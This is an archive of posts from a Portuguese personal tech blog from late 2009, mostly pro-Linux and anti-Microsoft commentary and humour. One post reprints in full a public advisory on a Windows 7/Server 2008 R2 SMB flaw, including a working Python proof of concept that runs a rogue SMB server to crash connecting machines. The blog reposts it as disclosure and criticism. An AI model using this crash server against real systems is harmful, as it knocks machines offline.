domingo, novembro 29, 2009

BEM...



São capazes de imaginar uma polémica(*) entre este logo oficial dos Jogos Olímpicos Londres 2012 e a nova lei britânica contra a pornografia?

Querem uma dica?

Pensem em Lisa Simpson...

Se ainda não chegaram lá ou querem saber mais sobre esta recente polémica basta ir nesta direcção.

Divirtam-se que esta semana é mais curta.

(*) - para além de ter custado a módica quantia de £400.000!

quinta-feira, novembro 26, 2009

INBRICS = REVOLUÇÃO?




Desculpem lá qualquer coisinha mas trata-se mais uma vez de Powered by "Linux" e também mais uma vez - ANDROID.

sexta-feira, novembro 20, 2009

MODELOS 3D COM UMA SIMPLES WEBCAM





"12/Nov/2009 - In a few months time when code porting (to new library versions) is complete, a Linux-based demo of ProFORMA should be released. This will be followed by a windows based demo."
Ok., fico à espera.

Como não podia deixar de ser lá andam estes malandrecos a "inventar" alta-tecnologia" e a disponibilizá-la inicialmente para "Linux". Porque será?
Comparem com o "feudalismo" M$ que grassa por cá apenas devido ao servilismo deste desgoverno face ao monopólio. Milhões, mais milhões e ainda mais milhões atirados ao vento apenas para provar que a tecnologia não é uma prostituta mas sim de quem a merece mesmo que estejam a trabalhar com ferramentas Livres e Abertas.

domingo, novembro 15, 2009

PAI NATAL, ESTÁS A OUVIR?

Sim?
Então pensa bem nisto, ok?

PARECE UMA ANEDOTA MAS NÃO É

Ou, colocado de outra forma, eis a "prova provada" como uma bola de futebol poderá eventualmente desencadear em Guerra Mundial...

Intervenientes:
- Consulat Général de France - CGF, usado a partir deste momento vs Department of Diplomatic Affairs (Irlanda) - DDA, usado a partir deste momento.

CGF - "(...) the President has requested that you provide a VIP box for the game(...)"

DDA - "(...) We would just like some clarification regarding the VIP box as there are a number of options available. Do you have any preferences re:size?"


CGF - "(...) We were not aware that boxes at the stadium came in different sizes. Do the dimensions have any bearing on one's enjoyment of the game?"

DDA - "(...) The overall match experience will certainly be influenced by the President's choice of box. T
he first box is 30cm (...) The second box is 60 cm (...) Rest assured that we will be treating this matter with the utmost confidentiality."

CGF - "(...) When we request a 'VIP box' for our President, we were not looking for a box for him to stand on. Whilst we expect the foreign media to make humorous evidence about the President's stature, we do not expect this from an official representative of the Irish Government department."

DDA - "
Please accept our apologies and those of the executive Hospitality Committee(...). There was certainly no intentional attempt at humour on our part and we hope that you accept this as a genuine misunderstanding. Naturally, we will make a VIP 'Executive' box available to the President, with full security and hospitality arrangements in place. The boxes will then be placed discreetly inside."

CGF - "In light of the lack of respect we feel your office has displayed in response to an official request from a visiting Head of State, the President has decided to watch the match in Paris instead. Rest assured that we will be lodging a formal complaint regarding your conduct at the highest levels."

DDA - "Fair enough. We look forward to seeing the boys in green give your lot a good hammering"

Ooooouuuuucccchhhhh. Pontapé nas bolas!
Infelizmente, como é óbvio segundo o ponto de vista dos irlandeses, a selecção irlandesa perdeu por uma bola a zero...

E agora?
Será desta que o pequenote-armado-em-Napoleão se faz ao mar e invade esses humorísticos irlandeses?

Como é lógico, estou apenas a brincar com estas coisas. De facto, sei que isto não se faz a um Presidente de uma Nação soberana mesmo que este seja um meia-tijela com intenções de reconquistar o antigo Império Napoleónico. Note-se que estou novamente a brincar, ok?
Só a brincar gozaria com a pequenez de um homenzinho que se quer armar em grande.
Peço desculpa pela minha brincadeira. No fundo, bem lá no fundo, tenho a noção estas coisas não se fazem. Não torno a gozar com a altura do baixinho.
Assim como assim o Asterix também era minúsculo e conquistou o mundo.
Um pouco de poção mágica e voila.
Ah!, pois esqueci-me que este não tem a poção mágica. Bem, este baixote co-príncipe de Andorra pode não ter uma poção mágica mas em contrapartida tem o seu pé-de-feijão. E que feijãozinho...
Basta trepar e matar todos os gigantes, para aí 99,9% da população masculina mundial mesmo os chineses mais pequenotes, para poder exclamar:
- Eu sou o Maior!


sábado, novembro 14, 2009

DIVIRTA-SE

Já há algum tempo alguém me tinha falado do FoxVox mas infelizmente nunca consegui saber mais sobre o assunto e entretanto também me esqueci da sua existência.
Postanto (não é gralha, não), quem me falou no FoxVox ponha o dedo no ar que a bejeca é por minha conta e no caso de ser no Porto talvez ainda siga uma francesinha num bar que recomendo.
Se tem blog?
Claro que tem.
Voltando ao assunto, este plugin para o Firefox é deveras interessante, embora a Maria fale um português que não consigo encaixar em qualquer região do nosso país, e dá para fazer umas brincadeiras tal com este músico do blog OSGEEX prova. Utilizando o FoxVox para ler alguns resumos de textos do evangelho segundo M$ "Evangelism is War!"(*), e misturando uma música própria, de qualidade muito duvidosa desde já aviso, criou uma canção que intitulou - "Tales from the Dark Side: Microsoft - The Slog".
Em resumo, como ele diz num comentário:
- "(...) This is my way of exposing Microsoft's dirty tricks to mankind.
I hope they will face the facts one fine day ;-)"

Eu também, acrescento.

Divirtam-se.

(*) - estes textos de natureza confidencial foram mostrados publicamente devido ao processo "Commes vs Microsoft" e onde se mostra até onde uma empresa pode ir para arrasar tudo e todos que lhe façam frente. Se estiverem interessados nesse mesmo post existem várias referências onde poderão consultar estas "obras-primas" do evangelismo mas desde já passo a avisar que o documento é extenso e mais facilmente poderão ver do que se trata se analisarem bem os comentários de diversas personagens que por aí andam.

Não precisam de nomes pois não?
É que se precisarem basta ir até a um site onde se possa esclarecer a natureza dos nomes. Foram todos escolhidos por lá.
  :-)

quinta-feira, novembro 12, 2009

(MOST SECURE OS EVER) - REDMOND, WE'VE GOT A PROBLEM.

Big problem!

Como não vejo qualquer outra forma de colocar aqui o problema sem ir preso devido a um aborto de Lei que por aí anda, Lei 109/2009 de 15 de Setembro, nem tampouco dizer se já experimentei ou não já que qualquer tentativa dá direito a uma pena mais severa que à dada (ou deveria dizer não dada?) aos ladrões de cartola que agora aparecem diariamente aos montes a meter a mão a milhões, irei transcrever na íntegra um grande problema que se afecta todos aqueles que utilizam Windows 7 e Server 2008 RC2 e também todos aqueles que o utilizarão até ao dia em que a M$ se importe verdadeiramente com os seus utilizadores e deixe de pensar apenas na carteira dos seus investidores.
Sem mais delongas:

"
This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL would have ever existed:

netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)

If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?

"Most secure Os ever";
What ever your firewall is set to, you can get remotly smashed via IE or even via some broadcasting nbns tricks (no user interaction)
How funny.


Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL


III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment:
This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotly crash any Windows 7/Server 2008R2
on a LAN or via IE


VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknoledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
More Remote Kernel FD @MS to come.
"

Quanto ao facto de eventualmente (*) isto não se poder fazer em Portugal, esse tal país que é um assombro Tecnológico mas que castra toda e qualquer investigação nesta área com uma porcaria copiada de alguém que não deveria servir de exemplo, aproveito para deixar aqui um comentário que pode servir a quem de direito:
- "That's the cost of security by obscurity and propaganda.
Like it or not, it's like that.
"

NOTA: o "bold" e letra vermelha são da responsabilidade do dono desta tasca, com a intenção de chamar a atenção para partes que são deveras importantes e a reter.

(*) - Apenas eventualemente. Alguém com conhecimentos jurídicos poderá informar melhor acerca desta coisa a que resolveram chamar de Lei. Segundo aquilo que consigo ler no Artigo 4º é uma mera tentativa de estourar um programa dá "direita" a uma punição!
Ou seja, meninos não estudem informática porque o nosso querido desgoverno não vos deixa fazer nada excepto pagar o imposto M$!

PS1: Se não perceberam bem o que se está a passar leiam os posts anteriores de Laurent Gaffié. Andava para aqui calado à espera do que isto iria dar já que suspeitei desde o 1º momento do facto do Windows 7 e Server RC2 estarem livres do bug do SMB.2 já aqui narrado. Como é óbvio também fiquei à espera do remendo da M$ que lá acabou por aparecer na tradicional data que a M$ estipula para estas coisas e, não a título excepcional como seria forçoso que tal acontecesse mais cedo, como um "sábio" da M$ aqui tentou transmitir só que recusado devido à sua alma de carroceiro. Bem, como é hábito, foi pior a emenda que o soneto tal como a M$ já nos vai habituando a estas coisas - remendos de remendos de remendos de remendos. Ah!, e nesta última actualização de (cof... cof... cof...) "segurança" há mais um grave erro mas isso fica para amanhã e após ter a certeza de qual o procedimento correcto.


PS2: Não mudem para SO's de jeito não.
(disclaimer: este conselho não se destina aos meninos que apenas usam o computador para se armarem em piratas dos sete mares, brincar aos soldadinhos, génios do futebol e afins. Apenas se destina a pessoas responsáveis - BUSINESS IMPACT, see?)

QUE NOVIDADE. IT WAS MY IDEA?

Os "enfeites" do 7 não passam de uma cópia do Mac OS X!

E não, não é uma simples opinião de alguém que apenas teve uma ideia mas sim de alguém que fala em nome da M$!

Como é lógico, logo de seguida se ouviram vozes de protesto:
- "Unfortunately this came from a Microsoft employee who was not involved in any aspect of designing Windows 7"

Bem, agora é que me começaram a baralhar. Então anda a propaganda da M$ a espalhar aos 4 ventos e a gastar $200 milhões na campanha destinada a promover o 7 - "I'm a PC and Windows 7 was my idea"!?

Afinal, em que ficamos?

Existe porém uma outra coisa que ressalta nesta entrevista e que tem a ver com a segurança do 7 ou melhor a estabilidade mas essa fica para daqui a uns instantes...

quarta-feira, novembro 11, 2009

PAREM AS MÁQUINAS!

Eis porque as patentes são uma merda!

Mais uma aberração do monopólio M$, ajudado pelo USPTO, que a todo o custo quer travar tudo o que é concorrência.

Espero que o caso Bilski se venha a tornar no funeral das patentes sobre software porque de outra forma o poder dos $$$ da M$ cega completamente os analistas do USPTO.

Como se pode esperar, a M$ vai tentar vir a terreiro desculpar-se com "é para protecção" mas de facto o que acontece é que nos bastidores vai cobrando pelas patentes que nunca inventou e noutros casos cobra descaradamente por patentes sobre coisas como o long-filename.

Espero que na Europa alguém esteja a ver estas manobras e não se deixe embalar por comités ocupados por figuras-chave da M$ que atravessaram o Atlântico para virem mandar nesta Europa que agora dizem ser Unida.

PS: Para aqueles que não sabem o que "sudo" quer dizer basta dar um saltinho até à Wikipedia

terça-feira, novembro 10, 2009

SIXTHSENSE

Poderia tratar-se do filme de M. Night Shyamalan mas não é.
Trata-se sim de uma notável "invenção" de Pranav Mistry e restante equipa do MIT cuja finalidade é mostrar-nos o mundo com outros "olhos".
Para além de mostrar todo o engenho que grassa por aqueles lados e neste caso em particular de Mistry o que acho mais notável ainda é a vontade explícita de libertar o código dentro de sensivelmente um mês.
Quanto à tecnologia, imagens valem mais do que as milhares de palavras que poderia proferir. Porém antes de let's look at the "traila" gostaria de realçar uns pequenos pormenores:
- No estado actual um projecto destes custa cerca de $350 (cerca de €233 em conversão directa);
- Pranav Mistry diz que já recebeu muitas ofertas mas o dinheiro não significa nada para ele. No mínimo louvável!

(caso estejam interessados em saber mais podem ler esta notícia no "The Hindu" ou ainda visitar o site oficial.


 


domingo, novembro 08, 2009

ORA BOLAS...

Segundo um estudo verdadeiramente independente afinal o tal de "Linux" está a equipar cerca de UM TERÇO dos netbooks vendidos durante o ano de 2009.
Perceberam bem?
Não?
Cerca de UM TERÇO dos 35 milhões de netbooks vendidos até agora!
Como a matemática não é uma batata, 32 % não tem nada a ver com os 4 % (*) que o monopólio e os habituais cronistas rendidos à cor do dinheiro de Redmond andam para aí a espalhar, pois não?
Só que estas coisas já não são novidade para ninguém tal como já a Dell o tinha exemplificado ao dizer que cerca de 1/3 dos seus netbooks eram equipados com "Linux". Aliás também foi a Dell a desmistificar a anedótica lenda que os netbooks com "Linux" eram umas não sei quantas vezes mais devolvidos do que os outros equipados com um produto fora de validade. E estou a falar da Dell que como toda a gente sabe é praticamente uma filial da M$.
Enfim, histórias da carochinha que desde tempos imemoriais vem tentando minar a confiança das pessoas no SL/A, como por exemplo aquelas estatísticas que dão o "Linux" com uma quota parte do mercado abaixo de 1%. Será que dentro dessas firmas não existe ninguém que pense um pouco e que medite sobre aquilo que a própria M$ diz através do seu principal protagonista?
Ui!, se o próprio Ballmer coloca "Linux" ao lado dos SO's da Apple e ao mesmo tempo sabendo das contas de sumir que eles fazem por aqueles lados...
Não é por nada mas as tais empresas que colocam Linux" abaixo de 1% são exactamente as mesmas que colocam os SO's da Apple com 6, 7 ou 8 %!

Seguindo o rumo do título, "ORA BOLAS" que os ditados portugueses continuam sempre actuais como por exemplo:
- "É mais fácil apanhar um mentiroso do que um coxo" ;

(*) - Sim, o que a M$ e respectiva imprensa adicta clamavam eram exactamente 4%. Apenas recentemente começou a surgir como que num passe de pura magia uma "correcção" para os 7%. Aliás, correcção essa que "apenas por coincidência" passou em claro à grande maioria dessa mesma imprensa que foi tão lesta a vomitar os 4% e que nunca veio a terreiro rectificar os tais 4% iniciais.

Nota: quando me refiro a imprensa, como é óbvio também incluo os blogs.

KDE DE PARABÉNS

Matthias Ettrich Receives German Federal Cross of Merit

"Matthias started the KDE project on October 14, 1996 with his now infamous email. The project grew in leaps and bounds, creating one of the most active and innovative Free Software communities today, and helped redefine the expectations users have from free software in general. Indirectly, the KDE community influenced the development of the whole Free Software ecosystem, shifting the focus from Unix as a server system to Unix as a powerful end-user desktop, pushing the boundaries until today."

Parabéns à comunidade kde e um abraço especial ao meu planetário companheiro - Nuno Pinheiro.

domingo, novembro 01, 2009

CRITÉRIOS...

Devido a alguns contratempos (esperados) com o 7 lá foi o je ver se alguém tinha sofrido dos mesmos problemas e ao mesmo tempo ver se já/como os tinham ultrapassado.
Afinal notei que existem mais problemas do que aquilo que inicialmente pensava mas praticamente prendiam-se todos com drivers para diverso tipo de hardware sendo que era justamente esse o problema que eu tinha. Ok, num Fórum lá consegui descobrir a forma de ultrapassar o problema e lá acabou por dar certo embora se trate de uma espécie de remendo.

E o porquê desta conversa toda?
É que nesse Fórum (e noutros também) li algumas críticas ao 7 e para cada crítica lá apareciam 10 ou 20 defensores com "a culpa não é da MS mas sim do fabricante do hardware", ou algo do género. Até aqui nada de anormal mesmo dando-se o caso de Steven Ballmer ter apregoado ao mundo inteiro e um cão que o 7 era compatível com tudo o que existia e ainda com tudo o que viesse a existir.
Como dizia, nada de anormal até ler outras questões relacionadas com GNU/Linux e Software Livre e Aberto. É que aqui, os meninos que defendiam a MS face à falta de drivers atribuindo as culpas aos fabricantes, eram exactamente os mesmos que culpavam GNU/Linux, e SL/A em geral, da mesmíssima coisa ou seja, a culpa aqui já deixava de ser dos fabricantes!

Enfim...